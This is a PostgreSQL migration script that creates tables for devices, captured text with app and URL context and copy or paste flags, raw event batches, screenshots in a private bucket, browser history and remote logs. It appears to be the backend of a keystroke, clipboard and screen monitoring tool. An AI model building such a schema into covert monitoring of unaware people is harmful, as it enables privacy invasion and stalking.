begin;

create table if not exists public.devices (
    device_id text primary key,
    device_name text not null default 'Unknown device',
    last_seen bigint not null,
    started_at bigint not null,
    joined_at bigint not null default (extract(epoch from now()) * 1000)::bigint
);

alter table public.devices
    add column if not exists device_name text not null default 'Unknown device',
    add column if not exists last_seen bigint,
    add column if not exists started_at bigint,
    add column if not exists joined_at bigint,
    add column if not exists screenshot_base64 text not null default '',
    add column if not exists screenshot_time bigint;

update public.devices
set joined_at = coalesce(joined_at, started_at, (extract(epoch from now()) * 1000)::bigint)
where joined_at is null;

alter table public.devices
    alter column joined_at set default (extract(epoch from now()) * 1000)::bigint,
    alter column joined_at set not null;

create index if not exists devices_last_seen_idx
    on public.devices (last_seen desc);

create index if not exists devices_joined_at_idx
    on public.devices (joined_at asc);

create table if not exists public.messages (
    id bigint primary key,
    text text not null,
    raw_text text not null default '',
    raw_only boolean not null default false,
    device_id text not null default 'unknown',
    device_name text not null default 'Unknown device',
    app_name text not null default 'Unknown app',
    source_url text not null default '',
    time bigint not null,
    is_pasted boolean not null default false,
    is_copied boolean not null default false,
    created_at timestamptz not null default now()
);

alter table public.messages
    add column if not exists raw_text text not null default '',
    add column if not exists raw_only boolean not null default false,
    add column if not exists device_id text not null default 'unknown',
    add column if not exists device_name text not null default 'Unknown device',
    add column if not exists app_name text not null default 'Unknown app',
    add column if not exists source_url text not null default '',
    add column if not exists is_pasted boolean not null default false,
    add column if not exists is_copied boolean not null default false,
    add column if not exists created_at timestamptz not null default now();

update public.messages
set raw_text = text
where raw_text = '';

create index if not exists messages_time_idx
    on public.messages (time desc);

create index if not exists messages_raw_only_idx
    on public.messages (raw_only, time desc);

create index if not exists messages_source_url_idx
    on public.messages (source_url)
    where source_url <> '';

create index if not exists messages_copied_idx
    on public.messages (is_copied)
    where is_copied = true;

create table if not exists public.raw_batches (
    batch_id text primary key,
    device_id text not null,
    device_name text not null default 'Unknown device',
    session_id text not null,
    started_at bigint not null,
    ended_at bigint not null,
    event_count integer not null,
    payload_base64 text not null,
    created_at timestamptz not null default now()
);

create index if not exists raw_batches_device_time_idx
    on public.raw_batches (device_id, started_at desc);

create index if not exists raw_batches_session_time_idx
    on public.raw_batches (session_id, started_at desc);

create table if not exists public.screenshots (
    id bigint generated always as identity primary key,
    device_id text not null,
    captured_at bigint not null,
    storage_path text not null unique,
    created_at timestamptz not null default now()
);

create index if not exists screenshots_device_time_idx
    on public.screenshots (device_id, captured_at desc);

insert into storage.buckets (id, name, public)
values ('screenshots', 'screenshots', false)
on conflict (id) do update set public = false;

create table if not exists public.website_history (
    id bigint generated always as identity primary key,
    device_id text not null,
    device_name text not null default 'Unknown device',
    browser text not null default 'Unknown browser',
    url text not null,
    visited_at bigint not null,
    created_at timestamptz not null default now()
);

create index if not exists website_history_device_time_idx
    on public.website_history (device_id, visited_at desc);

create table if not exists public.remote_logs (
    id bigint generated by default as identity primary key,
    device_id text not null default 'unknown',
    status text not null default 'Unknown',
    source text not null default 'unknown',
    created_at timestamptz not null default now(),
    payload jsonb
);

create index if not exists remote_logs_created_at_idx
    on public.remote_logs (created_at desc);

create index if not exists remote_logs_device_id_idx
    on public.remote_logs (device_id);

alter table public.messages
    drop column if exists screenshot_base64;

alter table public.devices
    drop column if exists screenshot_base64,
    drop column if exists screenshot_time;

commit;